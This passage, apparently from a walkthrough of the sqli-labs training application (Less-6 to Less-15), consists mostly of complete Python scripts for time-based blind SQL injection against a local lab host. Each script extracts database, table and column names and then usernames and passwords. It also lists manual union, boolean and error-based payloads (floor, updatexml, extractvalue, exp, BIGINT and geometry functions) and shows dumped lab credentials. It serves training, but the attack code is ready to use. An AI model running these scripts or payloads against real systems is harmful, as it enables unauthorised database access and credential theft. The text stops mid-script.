                if time.time() - start_time > 1:
                    values1 += chr(k)
                start_time = time.time()
                r.get(url2)
                if time.time() - start_time > 1:
                    values2 += chr(k)
                start_time = time.time()
                r.get(url3)
                if time.time() - start_time > 1:
                    values3 += chr(k)
        print("===第{}条记录的id值为:{},username的值为:{},password的值为:{}".format(i+1,values1,values2,values3))
        values1 = ''
        values2 = ''
        values3 = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # database name length, then the database name
    get_table_name_length(get_table_name_count())  # table count, then the length of each table name
    get_table_name(get_table_name_count())  # table count, then every table name
    get_column_name(get_column_name_count())  # column count of users, then every column name of users
    get_username(get_users_count())  # row count of users, then the id, username and password of each row
Brute-force output: (screenshots omitted)

Using error-based injection:
Similar to the error-based injection in Less-5, except that this level closes with a double-quoted string:
?id=-1" or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and "1"="1

?id=-1" or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and "1"="1

?id=-1" or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and "1"="1

Adjust the starting offset of limit to get the rows one after another!
Less-7:
Finding the injection point:
Determining the closing sequence:
'))
Brute-forcing with a Python script:
import requests
import time

# requests session used to send the probing requests:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0  # stays 0 when no guess in range matches
    for i in range(50):
        # key URL:
        url = "http://192.168.0.128:9020/Less-7/?id=-1')) or length(database())={} and sleep(0.1) and '1'=(('1".format(i)
        start_time = time.time()  # time before the request
        r.get(url)  # elapsed time is measured once the request returns
        if time.time() - start_time > 1:  # a response slower than 1 second means the length guess matched
            length = i
            break
    print("============="+"当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length+1):  # mid positions start at 1; range excludes the upper bound, hence +1
        for j in range(1,128):  # ASCII codes 1~127; range excludes the upper bound, hence 128
            url = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(mid(database(),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                database_name = database_name+chr(j)
                print(database_name)
                break
    print("============="+"当前数据库名为:"+database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        # key URL:
        url = "http://192.168.0.128:9020/Less-7/?id=-1')) or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) and '1'=(('1".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("============="+"当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            url = "http://192.168.0.128:9020/Less-7/?id=-1')) or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) and '1'=(('1".format(i,j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i+1)+str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # character positions start at 1
            for k in range(1,128):
                url = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j,k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
        print("第{}张数据表名为:".format(i+1)+table_name)
        table_name=''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        url = "http://192.168.0.128:9020/Less-7/?id=-1')) or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) and '1'=(('1".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table in the current database:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1,128):
                url = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j,k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        url = "http://192.168.0.128:9020/Less-7/?id=-1')) or (select count(*) from users )={} and sleep(0.1) and '1'=(('1".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of the users table in the current database:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values = ''
    for i in range(count):
        for j in range(1, 50):  # character positions start at 1
            for k in range(1,128):
                url1 = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j,k)
                # id, username and password are separated by '---' here, so one probe per character covers all three fields
                start_time = time.time()
                r.get(url1)
                if time.time() - start_time > 1:
                    values += chr(k)
                    print(values)
                    break
        print("===第{}条记录的id值为:".format(i+1)+values)
        values = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # database name length, then the database name
    get_table_name_length(get_table_name_count())  # table count, then the length of each table name
    get_table_name(get_table_name_count())  # table count, then every table name
    get_column_name(get_column_name_count())  # column count of users, then every column name of users
    get_username(get_users_count())  # row count of users, then the id, username and password of each row
Less-8:
Finding the injection point:
'
Payloads to try include:
' or 1=1--+
Brute-forcing with Python:
import requests
import time

# requests session used to send the probe requests:
r = requests.session()
# unused: the loops below try every ASCII code 1..127 instead of this character set
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0
    for i in range(50):
        # key url:
        url = "http://192.168.0.128:9020/Less-8/?id=-1' or length(database())={} and sleep(0.1) --+".format(i)
        start_time = time.time()  # time before the request
        r.get(url)                # the request itself
        # the guess is right when the response takes longer than 1 s: the 0.1 s sleep is
        # evaluated for every row the query scans, so the delays add up past the threshold
        if time.time() - start_time > 1:
            length = i
            break
    print("=============" + "当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length + 1):  # mid() positions are 1-based, so probe positions 1..length
        for j in range(1, 128):     # ASCII codes 1..127; range() excludes the upper bound, hence 128
            url = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(mid(database(),{},1))={} and sleep(0.1) --+".format(i, j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                database_name = database_name + chr(j)
                print(database_name)
                break
    print("=============" + "当前数据库名为:" + database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        # key url:
        url = "http://192.168.0.128:9020/Less-8/?id=-1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) --+".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            url = "http://192.168.0.128:9020/Less-8/?id=-1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) --+".format(i, j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i + 1) + str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # substr() positions are 1-based
            for k in range(1, 128):
                url = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) --+".format(i, j, k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
            else:
                break  # no character matched at this position: the name is complete
        print("第{}张数据表名为:".format(i + 1) + table_name)
        table_name = ''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        url = "http://192.168.0.128:9020/Less-8/?id=-1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) --+".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                url = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) --+".format(i, j, k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
            else:
                break  # end of this column name
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        url = "http://192.168.0.128:9020/Less-8/?id=-1' or (select count(*) from users )={} and sleep(0.1) --+".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of every row in the users table:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                url1 = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) --+".format(i, j, k)
                # id, username and password are joined with '---' in the extracted value
                start_time = time.time()
                r.get(url1)
                if time.time() - start_time > 1:
                    values += chr(k)
                    print(values)
                    break
            else:
                break  # end of this record
        print("===第{}条记录的id值为:".format(i + 1) + values)
        values = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # length of the current database name, then the name itself
    table_count = get_table_name_count()            # number of tables in the current database (queried once, reused below)
    get_table_name_length(table_count)              # length of each table name
    get_table_name(table_count)                     # every table name
    get_column_name(get_column_name_count())        # number of columns in users, then every column name
    get_username(get_users_count())                 # number of rows in users, then id/username/password of each row
Less-9:
Identify the injection point:
-1' or sleep(1)--+
The response is delayed, so time-based injection works
Brute-force with Python:
import requests
import time

# requests session used to send the probe requests:
r = requests.session()
# unused: the loops below try every ASCII code 1..127 instead of this character set
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0
    for i in range(50):
        # key url:
        url = "http://192.168.0.128:9020/Less-9/?id=-1' or length(database())={} and sleep(0.1)--+".format(i)
        start_time = time.time()  # time before the request
        r.get(url)                # the request itself
        # the guess is right when the response takes longer than 1 s: the 0.1 s sleep is
        # evaluated for every row the query scans, so the delays add up past the threshold
        if time.time() - start_time > 1:
            length = i
            break
    print("=============" + "当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length + 1):  # substr() positions are 1-based, so probe positions 1..length
        for j in range(1, 128):     # ASCII codes 1..127; range() excludes the upper bound, hence 128
            url = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((database()),{},1))={} and sleep(0.1)--+".format(i, j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                database_name = database_name + chr(j)
                print(database_name)
                break
    print("=============" + "当前数据库名为:" + database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        # key url:
        url = "http://192.168.0.128:9020/Less-9/?id=-1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) --+".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            url = "http://192.168.0.128:9020/Less-9/?id=-1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) --+".format(i, j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i + 1) + str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # substr() positions are 1-based
            for k in range(1, 128):
                url = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) --+".format(i, j, k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
            else:
                break  # no character matched at this position: the name is complete
        print("第{}张数据表名为:".format(i + 1) + table_name)
        table_name = ''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        url = "http://192.168.0.128:9020/Less-9/?id=-1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) --+".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                url = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) --+".format(i, j, k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
            else:
                break  # end of this column name
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        url = "http://192.168.0.128:9020/Less-9/?id=-1' or (select count(*) from users )={} and sleep(0.1) --+".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of every row in the users table:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                url1 = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) --+".format(i, j, k)
                # id, username and password are joined with '---' in the extracted value
                start_time = time.time()
                r.get(url1)
                if time.time() - start_time > 1:
                    values += chr(k)
                    print(values)
                    break
            else:
                break  # end of this record
        print("===第{}条记录的id值为:".format(i + 1) + values)
        values = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # length of the current database name, then the name itself
    table_count = get_table_name_count()            # number of tables in the current database (queried once, reused below)
    get_table_name_length(table_count)              # length of each table name
    get_table_name(table_count)                     # every table name
    get_column_name(get_column_name_count())        # number of columns in users, then every column name
    get_username(get_users_count())                 # number of rows in users, then id/username/password of each row
Less-10:
Identify the injection point:
-1" or sleep(1)--+
The delay shows that time-based injection is possible
Brute-force with a Python script:
import requests
import time

# requests session used to send the probe requests:
r = requests.session()
# unused: the loops below try every ASCII code 1..127 instead of this character set
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0
    for i in range(50):
        # key url:
        url = 'http://192.168.0.128:9020/Less-10/?id=-1" or length(database())={} and sleep(0.1)--+'.format(i)
        start_time = time.time()  # time before the request
        r.get(url)                # the request itself
        # the guess is right when the response takes longer than 1 s: the 0.1 s sleep is
        # evaluated for every row the query scans, so the delays add up past the threshold
        if time.time() - start_time > 1:
            length = i
            break
    print("=============" + "当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length + 1):  # substr() positions are 1-based, so probe positions 1..length
        for j in range(1, 128):     # ASCII codes 1..127; range() excludes the upper bound, hence 128
            url = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((database()),{},1))={} and sleep(0.1)--+'.format(i, j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                database_name = database_name + chr(j)
                print(database_name)
                break
    print("=============" + "当前数据库名为:" + database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        # key url:
        url = 'http://192.168.0.128:9020/Less-10/?id=-1" or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) --+'.format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            url = 'http://192.168.0.128:9020/Less-10/?id=-1" or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) --+'.format(i, j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i + 1) + str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # substr() positions are 1-based
            for k in range(1, 128):
                url = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) --+'.format(i, j, k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
            else:
                break  # no character matched at this position: the name is complete
        print("第{}张数据表名为:".format(i + 1) + table_name)
        table_name = ''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        url = 'http://192.168.0.128:9020/Less-10/?id=-1" or (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users")={} and sleep(0.1) --+'.format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                url = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit {},1),{},1))={} and sleep(0.1) --+'.format(i, j, k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
            else:
                break  # end of this column name
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        url = 'http://192.168.0.128:9020/Less-10/?id=-1" or (select count(*) from users )={} and sleep(0.1) --+'.format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of every row in the users table:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1, 128):
                url1 = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((select concat(id,"---",username,"---",password) from users limit {},1),{},1))={} and sleep(0.1) --+'.format(i, j, k)
                # id, username and password are joined with '---' in the extracted value
                start_time = time.time()
                r.get(url1)
                if time.time() - start_time > 1:
                    values += chr(k)
                    print(values)
                    break
            else:
                break  # end of this record
        print("===第{}条记录的id值为:".format(i + 1) + values)
        values = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # length of the current database name, then the name itself
    table_count = get_table_name_count()            # number of tables in the current database (queried once, reused below)
    get_table_name_length(table_count)              # length of each table name
    get_table_name(table_count)                     # every table name
    get_column_name(get_column_name_count())        # number of columns in users, then every column name
    get_username(get_users_count())                 # number of rows in users, then id/username/password of each row
Less-11:
Identify the injection point:
'

Closed with a single quote
POST request (form)
Confirm the injection with an always-true condition:
' or 1=1 #

Use order by to determine the number of columns:
' order by 1 #

Test in turn:
' order by 3 #

Testing the third column returns Unknown column '3' in 'order clause'
so the query selects 2 columns
Use union injection:
' union select 1,2 #

1 and 2 are echoed
Dump all databases:
' union select group_concat(schema_name),database() from information_schema.schemata #

All database names:
information_schema,challenges,mysql,performance_schema,security
Current database:
security
Dump the current database name and all tables of the current database:
' union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #

All tables in the current database:
emails,referers,uagents,users
Dump all column names (fields) of the users table:
' union select group_concat(column_name),2 from information_schema.columns where table_name='users' #

All fields of users:
id,username,password
Dump the data:
' union select group_concat(username,' ',password),2 from users #

Dumb Dumb,
Angelina I-kill-you,
Dummy p@ssword,
secure crappy,
stupid stupidity,
superman genious,
batman mob!le,
admin admin,
admin1 admin1,
admin2 admin2,
admin3 admin3,
dhakkan dumbo,
admin4 admin4
Less-12:
Identify the injection point:
Input a double quote:
"

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") and password=("") LIMIT 0,1' at line 1
The closure is: ")
Try the injection again:
1") or 1=1 #

Determine the number of columns:
") order by 1#

Try again:
") order by 3#

Error: Unknown column '3' in 'order clause'
so there are 2 columns
Use union injection:
") union select 1,2#

Dump all databases:
") union select group_concat(schema_name),database() from information_schema.schemata #

Dump the current database name and all tables of the current database:
") union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #

Dump all column names (fields) of the users table:
") union select group_concat(column_name),2 from information_schema.columns where table_name='users' #

Dump the data:
") union select group_concat(username,' ',password),2 from users #

Less-13:
Identify the injection point:
Input '
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') and password=('') LIMIT 0,1' at line 1
The closure is ')
Try the universal password:
1') or 1=1#

Result: login succeeds
but nothing is echoed, so union injection cannot be used
Use error-based injection:
floor() injection:
1') or 1= (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #

1') or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #

Duplicate-column (NAME_CONST) error injection:
1') or (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x) #

extractvalue injection:
1') or (select extractvalue(1,concat(0x7e,(select database()),0x7e))) #

Less-14:
Identify the injection point:
Input "
"

Error message:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""" and password="" LIMIT 0,1' at line 1
The closure is a double quote
1" or 1=1#

Login succeeds, but nothing is echoed (union injection cannot be used)
Use error-based injection:
floor() injection:
1" or 1= (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #

updatexml error injection:
1" or (select updatexml(1,concat(0x7e,(select database())),1)) #

1" or (select updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1)),1)) #

Error injection via a DOUBLE value out of range (exp()):
1" or (select (exp(~(select * from (select database())a)))) #

Error injection via BIGINT overflow:
1" or (select (!(select * from (select user())x) - ~0)) #

geometrycollection():
1" or (geometrycollection((select * from (select * from (select user())a)b))) #

multipoint():
1" or (multipoint((select * from (select * from (select user())a)b))) #

Less-15:
Identify the injection point:
The injection point is a single quote '
Enter a time-delay function:
1' or 1=sleep(1)#

Time-based injection is possible
Test the database name length:
1' or length(database())>1 and sleep(1)#
Brute-force with a Python script:
import requests
import time

